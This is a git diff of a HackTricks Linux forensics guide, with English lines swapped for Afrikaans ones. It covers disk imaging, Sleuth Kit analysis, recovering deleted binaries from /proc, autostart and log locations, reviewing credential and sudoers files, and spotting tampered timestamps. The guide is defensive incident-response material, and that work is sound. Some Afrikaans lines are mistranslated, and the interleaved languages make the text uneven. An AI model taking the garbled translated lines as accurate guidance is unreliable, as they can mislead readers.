@ -105,35 +97,33 @@ dd if=<subject device> of=<image file> bs=512
dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file>
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
```
### Voor-analise van skijfafbeelding
### Disk Image pre-analysis
Imaging a disk image with no more data.
Beeld 'n skijfafbeelding af sonder enige verdere data.
```bash
#Find out if it's a disk image using "file" command
file disk.img
file disk.img
disk.img: Linux rev 1.0 ext4 filesystem data, UUID=59e7a736-9c90-4fab-ae35-1d6a28e5de27 (extents) (64bit) (large files) (huge files)
#Check which type of disk image it's
img_stat -t evidence.img
img_stat -t evidence.img
raw
#You can list supported types with
img_stat -i list
Supported image format types:
raw (Single or split raw file (dd))
aff (Advanced Forensic Format)
afd (AFF Multiple File)
afm (AFF with external metadata)
afflib (All AFFLIB image formats (including beta ones))
ewf (Expert Witness Format (EnCase))
raw (Single or split raw file (dd))
aff (Advanced Forensic Format)
afd (AFF Multiple File)
afm (AFF with external metadata)
afflib (All AFFLIB image formats (including beta ones))
ewf (Expert Witness Format (EnCase))
#Data of the image
fsstat -i raw -f ext4 disk.img
fsstat -i raw -f ext4 disk.img
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: Ext4
Volume Name:
Volume Name:
Volume ID: 162850f203fd75afab4f1e4736a7e776
Last Written at: 2020-02-06 06:22:48 (UTC)
@ -162,42 +152,39 @@ r/r 16: secret.txt
icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret
```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Search for known Malware
## Soek na bekende Malware
### Modified System Files
### Gewysigde Sisteemlêers
Linux offers tools for ensuring the integrity of system components, crucial for spotting potentially problematic files.
Linux bied gereedskap om die integriteit van sisteemkomponente te verseker, wat belangrik is om potensieel problematiese lêers op te spoor.
- **RedHat-based systems**: Use `rpm -Va` for a comprehensive check.
- **Debian-based systems**: `dpkg --verify` for initial verification, followed by `debsums | grep -v "OK$"` (after installing `debsums` with `apt-get install debsums`) to identify any issues.
- **RedHat-gebaseerde stelsels**: Gebruik `rpm -Va` vir 'n omvattende ondersoek.
- **Debian-gebaseerde stelsels**: `dpkg --verify` vir aanvanklike verifikasie, gevolg deur `debsums | grep -v "OK$"` (nadat `debsums` geïnstalleer is met `apt-get install debsums`) om enige probleme te identifiseer.
### Malware/Rootkit Detectors
### Malware/Rootkit Detekteerders
Read the following page to learn about tools that can be useful to find malware:
Lees die volgende bladsy om meer te wete te kom oor gereedskap wat nuttig kan wees om malware op te spoor:
{% content-ref url="malware-analysis.md" %}
[malware-analysis.md](malware-analysis.md)
{% endcontent-ref %}
## Search installed programs
## Soek geïnstalleerde programme
To effectively search for installed programs on both Debian and RedHat systems, consider leveraging system logs and databases alongside manual checks in common directories.
Om doeltreffend te soek na geïnstalleerde programme op beide Debian- en RedHat-stelsels, oorweeg om stelsellogboeke en databasisse saam met handmatige kontroles in algemene gidslys te gebruik.
- For Debian, inspect **_`/var/lib/dpkg/status`_** and **_`/var/log/dpkg.log`_** to fetch details about package installations, using `grep` to filter for specific information.
- Vir Debian, ondersoek **_`/var/lib/dpkg/status`_** en **_`/var/log/dpkg.log`_** om besonderhede oor pakketaanbringings te verkry, deur `grep` te gebruik om te filtreer vir spesifieke inligting.
- RedHat users can query the RPM database with `rpm -qa --root=/mntpath/var/lib/rpm` to list installed packages.
To uncover software installed manually or outside of these package managers, explore directories like **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, and **_`/sbin`_**. Combine directory listings with system-specific commands to identify executables not associated with known packages, enhancing your search for all installed programs.
- RedHat-gebruikers kan die RPM-databasis ondervra met `rpm -qa --root=/mntpath/var/lib/rpm` om geïnstalleerde pakkette te lys.
Om sagteware wat handmatig of buite hierdie pakketsbestuurders geïnstalleer is, op te spoor, verken gidslyste soos **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, en **_`/sbin`_**. Kombineer gidslyste met stelselspesifieke opdragte om uitvoerbare lêers te identifiseer wat nie met bekende pakkette geassosieer word nie, en verbeter soek na alle geïnstalleerde programme.
```bash
# Debian package and log details
cat /var/lib/dpkg/status | grep -E "Package:|Status:"
@ -213,30 +200,46 @@ find /sbin/ exec rpm -qf {} \; | grep "is not"
# Find exacuable files
find / -type f -executable | grep <something>
```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Recover Deleted Running Binaries
Imagina a process taht was executed from /tmp/exec and deleted. It's possible to extract it
## Herstel Verwyderde Lopende Binêre Lêers
Stel jou voor 'n proses wat uitgevoer is vanaf /tmp/exec en verwyder is. Dit is moontlik om dit te onttrek.
```bash
cd /proc/3746/ #PID with the exec file deleted
head -1 maps #Get address of the file. It was 08048000-08049000
dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it
```
## Inspekteer Autostart-plekke
## Inspect Autostart locations
### Geskeduleerde Take
### Scheduled Tasks
```html
Scheduled tasks are a common way for programs to run automatically at specific times or intervals. In Linux, the cron daemon is responsible for managing scheduled tasks. To inspect scheduled tasks, you can check the contents of the `/etc/cron.d/` directory and the user-specific cron files located in `/var/spool/cron/crontabs/`.
To view the contents of the `/etc/cron.d/` directory, you can use the following command:
```bash
ls -l /etc/cron.d/
```
This will display a list of files that correspond to scheduled tasks. Each file represents a separate task and contains the command to be executed and the schedule for when it should run.
To view the user-specific cron files, you can use the following command:
```bash
ls -l /var/spool/cron/crontabs/
```
This will display a list of files that correspond to the cron files for each user. Each file represents a separate user and contains their individual scheduled tasks.
Inspecting these autostart locations can help identify any suspicious or unauthorized tasks that may be running on the system.
```
```bash
cat /var/spool/cron/crontabs/* \
/var/spool/cron/atjobs \
@ -250,63 +253,62 @@ cat /var/spool/cron/crontabs/* \
#MacOS
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
```
### Dienste
### Services
Paaie waar 'n kwaadwillige program as 'n diens geïnstalleer kan word:
Paths where a malware could be isntalled as a service:
- **/etc/inittab**: Calls initialization scripts like rc.sysinit, directing further to startup scripts.
- **/etc/rc.d/** and **/etc/rc.boot/**: Contain scripts for service startup, the latter being found in older Linux versions.
- **/etc/init.d/**: Used in certain Linux versions like Debian for storing startup scripts.
- Services may also be activated via **/etc/inetd.conf** or **/etc/xinetd/**, depending on the Linux variant.
- **/etc/systemd/system**: A directory for system and service manager scripts.
- **/etc/systemd/system/multi-user.target.wants/**: Contains links to services that should be started in a multi-user runlevel.
- **/usr/local/etc/rc.d/**: For custom or third-party services.
- **~/.config/autostart/**: For user-specific automatic startup applications, which can be a hiding spot for user-targeted malware.
- **/lib/systemd/system/**: System-wide default unit files provided by installed packages.
- **/etc/inittab**: Roep inisialiseringsskripte soos rc.sysinit aan, wat verder verwys na opstartskripte.
- **/etc/rc.d/** en **/etc/rc.boot/**: Bevat skripte vir diensopstart, waarvan die laasgenoemde in ouer Linux-weergawes gevind word.
- **/etc/init.d/**: Word gebruik in sekere Linux-weergawes soos Debian om opstartskripte te stoor.
- Dienste kan ook geaktiveer word via **/etc/inetd.conf** of **/etc/xinetd/**, afhangende van die Linux-variant.
- **/etc/systemd/system**: 'n Gids vir stelsel- en diensbestuurskripte.
- **/etc/systemd/system/multi-user.target.wants/**: Bevat skakels na dienste wat in 'n multi-gebruiker vlak gestart moet word.
- **/usr/local/etc/rc.d/**: Vir aangepaste of derdeparty-dienste.
- **~/.config/autostart/**: Vir gebruikersspesifieke outomatiese opstarttoepassings, wat 'n versteekte plek vir gebruikersgerigte kwaadwillige programme kan wees.
- **/lib/systemd/system/**: Stelselwye verstek eenheidslêers wat deur geïnstalleerde pakkette voorsien word.
### Kernel Modules
### Kernelmodules
Linux kernel modules, often utilized by malware as rootkit components, are loaded at system boot. The directories and files critical for these modules include:
Linux-kernelmodules, dikwels deur kwaadwillige programme as rootkit-komponente gebruik, word by stelselopstart gelaai. Die kritieke gids en lêers vir hierdie modules sluit in:
- **/lib/modules/$(uname -r)**: Holds modules for the running kernel version.
- **/etc/modprobe.d**: Contains configuration files to control module loading.
- **/etc/modprobe** and **/etc/modprobe.conf**: Files for global module settings.
- **/lib/modules/$(uname -r)**: Bevat modules vir die lopende kernelweergawe.
- **/etc/modprobe.d**: Bevat konfigurasie-lêers om modulelaaiing te beheer.
- **/etc/modprobe** en **/etc/modprobe.conf**: Lêers vir globale module-instellings.
### Other Autostart Locations
### Ander outomatiese opstartlokasies
Linux employs various files for automatically executing programs upon user login, potentially harboring malware:
Linux maak gebruik van verskeie lêers om programme outomaties uit te voer wanneer 'n gebruiker aanmeld, wat potensieel kwaadwillige programme kan bevat:
- **/etc/profile.d/***, **/etc/profile**, and **/etc/bash.bashrc**: Executed for any user login.
- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, and **~/.config/autostart**: User-specific files that run upon their login.
- **/etc/rc.local**: Runs after all system services have started, marking the end of the transition to a multiuser environment.
- **/etc/profile.d/***, **/etc/profile**, en **/etc/bash.bashrc**: Uitgevoer vir enige gebruikersaanmelding.
- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, en **~/.config/autostart**: Gebruikersspesifieke lêers wat uitgevoer word wanneer hulle aanmeld.
- **/etc/rc.local**: Word uitgevoer nadat alle stelseldienste gestart het, wat die einde van die oorgang na 'n multi-gebruiker omgewing aandui.
## Examine Logs
## Ondersoek Loglêers
Linux systems track user activities and system events through various log files. These logs are pivotal for identifying unauthorized access, malware infections, and other security incidents. Key log files include:
Linux-stelsels hou gebruikersaktiwiteite en stelselgebeure by deur middel van verskeie loglêers. Hierdie loglêers is van kritieke belang vir die identifisering van ongemagtigde toegang, kwaadwillige infeksies en ander sekuriteitsvoorvalle. Sleutelloglêers sluit in:
- **/var/log/syslog** (Debian) or **/var/log/messages** (RedHat): Capture system-wide messages and activities.
- **/var/log/auth.log** (Debian) or **/var/log/secure** (RedHat): Record authentication attempts, successful and failed logins.
- Use `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` to filter relevant authentication events.
- **/var/log/boot.log**: Contains system startup messages.
- **/var/log/maillog** or **/var/log/mail.log**: Logs email server activities, useful for tracking email-related services.
- **/var/log/kern.log**: Stores kernel messages, including errors and warnings.
- **/var/log/dmesg**: Holds device driver messages.
- **/var/log/faillog**: Records failed login attempts, aiding in security breach investigations.
- **/var/log/cron**: Logs cron job executions.
- **/var/log/daemon.log**: Tracks background service activities.
- **/var/log/btmp**: Documents failed login attempts.
- **/var/log/httpd/**: Contains Apache HTTPD error and access logs.
- **/var/log/mysqld.log** or **/var/log/mysql.log**: Logs MySQL database activities.
- **/var/log/xferlog**: Records FTP file transfers.
- **/var/log/**: Always check for unexpected logs here.
- **/var/log/syslog** (Debian) of **/var/log/messages** (RedHat): Vang stelselwye boodskappe en aktiwiteite op.
- **/var/log/auth.log** (Debian) of **/var/log/secure** (RedHat): Neem outentiseringspogings, suksesvolle en mislukte aanmeldings op.
- Gebruik `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` om relevante outentiseringsgebeure te filter.
- **/var/log/boot.log**: Bevat stelselopstartboodskappe.
- **/var/log/maillog** of **/var/log/mail.log**: Log e-posbedieneraktiwiteite, nuttig vir die opspoor van e-posverwante dienste.
- **/var/log/kern.log**: Stoor kernelboodskappe, insluitend foute en waarskuwings.
- **/var/log/dmesg**: Bevat toestuurprogramboodskappe.
- **/var/log/faillog**: Neem mislukte aanmeldingspogings op, wat help met sekuriteitskrisisondersoeke.
- **/var/log/cron**: Log cron-werkuitvoerings.
- **/var/log/daemon.log**: Volg agtergronddiensaktiwiteite.
- **/var/log/btmp**: Dokumenteer mislukte aanmeldingspogings.
- **/var/log/httpd/**: Bevat Apache HTTPD-fout- en toegangsloglêers.
- **/var/log/mysqld.log** of **/var/log/mysql.log**: Log MySQL-databasisaktiwiteite.
- **/var/log/xferlog**: Neem FTP-lêeroordragte op.
- **/var/log/**: Kontroleer altyd vir onverwagte loglêers hier.
{% hint style="info" %}
Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. Because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering.
Linux-stelselloglêers en oudit-subsisteme kan gedeaktiveer of uitgewis word tydens 'n inbreuk of kwaadwillige voorval. Omdat loglêers op Linux-stelsels gewoonlik van die nuttigste inligting oor kwaadwillige aktiwiteite bevat, verwyder indringers dit gereeld. Daarom is dit belangrik om, wanneer beskikbare loglêers ondersoek word, te kyk vir gaping of uit plek ininskrywings wat 'n aanduiding van uitwissing of manipulasie kan wees.
{% endhint %}
**Linux maintains a command history for each user**, stored in:
**Linux hou 'n opdraggeskiedenis vir elke gebruiker by**, gestoor in:
- ~/.bash_history
- ~/.zsh_history
@ -314,42 +316,39 @@ Linux system logs and audit subsystems may be disabled or deleted in an intrusio
- ~/.python_history
- ~/.*_history
Moreover, the `last -Faiwx` command provides a list of user logins. Check it for unknown or unexpected logins.
Verder verskaf die `last -Faiwx`-opdrag 'n lys van gebruikersaanmeldings. Kontroleer dit vir onbekende of onverwagte aanmeldings.
Check files that can grant extra rprivileges:
Kontroleer lêers wat ekstra regte kan verleen:
- Review `/etc/sudoers` for unanticipated user privileges that may have been granted.
- Review `/etc/sudoers.d/` for unanticipated user privileges that may have been granted.
- Examine `/etc/groups` to identify any unusual group memberships or permissions.
- Examine `/etc/passwd` to identify any unusual group memberships or permissions.
- Ondersoek `/etc/sudoers` vir onverwagte gebruikersregte wat moontlik toegeken is.
- Ondersoek `/etc/sudoers.d/` vir onverwagte gebruikersregte wat moontlik toegeken is.
- Ondersoek `/etc/groups` om enige ongewone groepslidmaatskappe of -regte te identifiseer.
- Ondersoek `/etc/passwd` om enige ongewone groepslidmaatskappe of -regte te identifiseer.
Some apps alse generates its own logs:
Sommige programme genereer ook hul eie loglêers:
- **SSH**: Examine _~/.ssh/authorized_keys_ and _~/.ssh/known_hosts_ for unauthorized remote connections.
- **Gnome Desktop**: Look into _~/.recently-used.xbel_ for recently accessed files via Gnome applications.
- **Firefox/Chrome**: Check browser history and downloads in _~/.mozilla/firefox_ or _~/.config/google-chrome_ for suspicious activities.
- **VIM**: Review _~/.viminfo_ for usage details, such as accessed file paths and search history.
- **Open Office**: Check for recent document access that may indicate compromised files.
- **FTP/SFTP**: Review logs in _~/.ftp_history_ or _~/.sftp_history_ for file transfers that might be unauthorized.
- **MySQL**: Investigate _~/.mysql_history_ for executed MySQL queries, potentially revealing unauthorized database activities.
- **Less**: Analyze _~/.lesshst_ for usage history, including viewed files and commands executed.
- **Git**: Examine _~/.gitconfig_ and project _.git/logs_ for changes to repositories.
- **SSH**: Ondersoek _~/.ssh/authorized_keys_ en _~/.ssh/known_hosts_ vir ongemagtigde afstandsverbindinge.
- **Gnome Desktop**: Kyk na _~/.recently-used.xbel_ vir onlangs benaderde lêers via Gnome-toepassings.
- **Firefox/Chrome**: Kontroleer blaaiergeskiedenis en aflaaiers in _~/.mozilla/firefox_ of _~/.config/google-chrome_ vir verdagte aktiwiteite.
- **VIM**: Ondersoek _~/.viminfo_ vir gebruiksdetails, soos benaderde lêerpaadjies en soekgeskiedenis.
- **Open Office**: Kyk vir onlangse dokumenttoegang wat dui op gekompromitteerde lêers.
- **FTP/SFTP**: Ondersoek loglêers in _~/.ftp_history_ of _~/.sftp_history_ vir lêeroordragte wat moontlik ongemagtig is.
- **MySQL**: Ondersoek _~/.mysql_history_ vir uitgevoerde MySQL-navrae, wat moontlik ongemagtigde databasisaktiwiteite kan onthul.
- **Less**: Analiseer _~/.lesshst_ vir gebruiksgeskiedenis, insluitend besigtigde lêers en uitgevoerde opdragte.
- **Git**: Ondersoek _~/.gitconfig_ en projek _.git/logs_ vir veranderinge aan bewaarplekke.
### USB Logs
### USB-loglêers
[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables.
[**usbrip**](https://github.com/snovvcrash/usbrip) is 'n klein stukkie sagteware wat in suiwer Python 3 geskryf is en Linux-loglêers (`/var/log/syslog*` of `/var/log/messages*` afhangende van die distribusie) ontleed om USB-gebeurtenisgeskiedenis-tabelle saam te stel.
It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USBs to find "violation events" (the use of USBs that aren't inside that list).
### Installation
Dit is interessant om **alle USB's wat gebruik is**, te ken en dit sal nuttiger wees as jy 'n geoorloofde lys van USB's het om "oortredingsgebeure" (die gebruik van USB's wat nie binne daardie lys val nie) te vind.
### Installasie
```bash
pip3 install usbrip
usbrip ids download #Download USB ID database
```
### Examples
### Voorbeelde
```bash
usbrip events history #Get USB history of your curent linux machine
usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user
@ -357,115 +356,109 @@ usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR
usbrip ids download #Downlaod database
usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
```
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
Meer voorbeelde en inligting binne die github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Review User Accounts and Logon Activities
## Oorsig van Gebruikersrekeninge en Aantekenaktiwiteite
Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\
Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
Finally, look for accounts with **no passwords** or **easily guessed** passwords.
Ondersoek die _**/etc/passwd**_, _**/etc/shadow**_ en **sekuriteitslêers** vir ongewone name of rekeninge wat geskep is en/of gebruik is in die nabyheid van bekende ongemagtigde gebeure. Kyk ook na moontlike sudo-bruteforce-aanvalle.\
Verder, kyk na lêers soos _**/etc/sudoers**_ en _**/etc/groups**_ vir onverwagte voorregte wat aan gebruikers gegee is.\
Kyk uiteindelik vir rekeninge sonder wagwoorde of maklik raai wagwoorde.
## Examine File System
## Ondersoek Lêersisteem
### Analyzing File System Structures in Malware Investigation
### Analise van Lêersisteemstrukture in Malware-ondersoek
When investigating malware incidents, the structure of the file system is a crucial source of information, revealing both the sequence of events and the malware's content. However, malware authors are developing techniques to hinder this analysis, such as modifying file timestamps or avoiding the file system for data storage.
Wanneer malware-voorvalle ondersoek word, is die struktuur van die lêersisteem 'n belangrike bron van inligting wat beide die volgorde van gebeure en die inhoud van die malware onthul. Tog ontwikkel malware-skrywers tegnieke om hierdie analise te bemoeilik, soos die wysiging van lêerstempels of die vermyding van die lêersisteem vir data-opberging.
To counter these anti-forensic methods, it's essential to:
- **Conduct a thorough timeline analysis** using tools like **Autopsy** for visualizing event timelines or **Sleuth Kit's** `mactime` for detailed timeline data.
- **Investigate unexpected scripts** in the system's $PATH, which might include shell or PHP scripts used by attackers.
- **Examine `/dev` for atypical files**, as it traditionally contains special files, but may house malware-related files.
- **Search for hidden files or directories** with names like ".. " (dot dot space) or "..^G" (dot dot control-G), which could conceal malicious content.
- **Identify setuid root files** using the command:
```find / -user root -perm -04000 -print```
This finds files with elevated permissions, which could be abused by attackers.
- **Review deletion timestamps** in inode tables to spot mass file deletions, possibly indicating the presence of rootkits or trojans.
- **Inspect consecutive inodes** for nearby malicious files after identifying one, as they may have been placed together.
- **Check common binary directories** (_/bin_, _/sbin_) for recently modified files, as these could be altered by malware.
Om hierdie teen-forensiese metodes te teenwerk, is dit noodsaaklik om:
- **'n Deeglike tydlyn-analise uit te voer** met behulp van instrumente soos **Autopsy** om gebeurtenis-tydlyne te visualiseer of **Sleuth Kit se** `mactime` vir gedetailleerde tydlyn-data.
- **Onverwagte skripte in die $PATH van die stelsel te ondersoek**, wat skulpskote of PHP-skripte wat deur aanvallers gebruik word, kan insluit.
- **`/dev` te ondersoek vir ongewone lêers**, aangesien dit tradisioneel spesiale lêers bevat, maar moontlik malware-verwante lêers kan huisves.
- **Te soek na verskuilde lêers of gidslyne** met name soos ".. " (punt punt spasie) of "..^G" (punt punt beheer-G), wat kwaadwillige inhoud kan verberg.
- **Setuid-root-lêers te identifiseer** met behulp van die opdrag:
```find / -user root -perm -04000 -print```
Dit vind lêers met verhoogde voorregte wat deur aanvallers misbruik kan word.
- **Verwyderingstempelmerkers** in inode-tabelle te hersien om massiewe lêerverwyderings op te spoor, wat moontlik die teenwoordigheid van rootkits of trojane aandui.
- **Opeenvolgende inodes te ondersoek** vir nabygeleë kwaadwillige lêers nadat een geïdentifiseer is, aangesien hulle saam geplaas kon wees.
- **Gewone binêre gidslyne** (_/bin_, _/sbin_) te ondersoek vir onlangs gewysigde lêers, aangesien hierdie deur malware gewysig kon word.
```bash
# List recent files in a directory:
# List recent files in a directory:
ls -laR --sort=time /bin```
# Sort files in a directory by inode:
# Sort files in a directory by inode:
ls -lai /bin | sort -n```
```
{% hint style="info" %}
Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modified at the **same time** as the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
Let daarop dat 'n **aanvaller** die **tyd** kan **verander** om **lêers te laat voorkom** asof dit **wettig** is, maar hy kan die **inode** nie verander nie. As jy vind dat 'n **lêer** aandui dat dit geskep en verander is op dieselfde tyd as die res van die lêers in dieselfde vouer, maar die **inode** onverwags groter is, dan is die **tydstempels van daardie lêer verander**.
{% endhint %}
## Compare files of different filesystem versions
## Vergelyk lêers van verskillende lêersisteemweergawes
### Filesystem Version Comparison Summary
### Opsomming van Vergelyking van Lêersisteemweergawes
To compare filesystem versions and pinpoint changes, we use simplified `git diff` commands:
Om lêersisteemweergawes te vergelyk en veranderinge te identifiseer, gebruik ons vereenvoudigde `git diff`-opdragte:
- **To find new files**, compare two directories:
- **Om nuwe lêers te vind**, vergelyk twee gidsen:
```bash
git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/
```
- **For modified content**, list changes while ignoring specific lines:
- **Vir gewysigde inhoud**, lys veranderinge terwyl spesifieke lyne geïgnoreer word:
```bash
git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time"
```
- **To detect deleted files**:
- **Om uitgewisde lêers op te spoor**:
```bash
git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
```
- **Filteropsies** (`--diff-filter`) help om te versmalling na spesifieke veranderinge soos bygevoeg (`A`), verwyder (`D`), of gewysig (`M`) lêers.
- `A`: Bygevoegde lêers
- `C`: Gekopieerde lêers
- `D`: Verwyderde lêers
- `M`: Gewysigde lêers
- `R`: Hernoemde lêers
- `T`: Tipe veranderinge (bv. lêer na simbooliese skakel)
- `U`: Onversoenbare lêers
- `X`: Onbekende lêers
- `B`: Gebroke lêers
- **Filter options** (`--diff-filter`) help narrow down to specific changes like added (`A`), deleted (`D`), or modified (`M`) files.
- `A`: Added files
- `C`: Copied files
- `D`: Deleted files
- `M`: Modified files
- `R`: Renamed files
- `T`: Type changes (e.g., file to symlink)
- `U`: Unmerged files
- `X`: Unknown files
- `B`: Broken files
## References
## Verwysings
* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
* [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203)
* **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
* **Boek: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
**Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
**Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
Kry Vandag Toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

264
forensics/basic-forensic-methodology/malware-analysis.md
View file

@ -1,24 +1,24 @@
# Malware Analysis
# Malware Analise
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
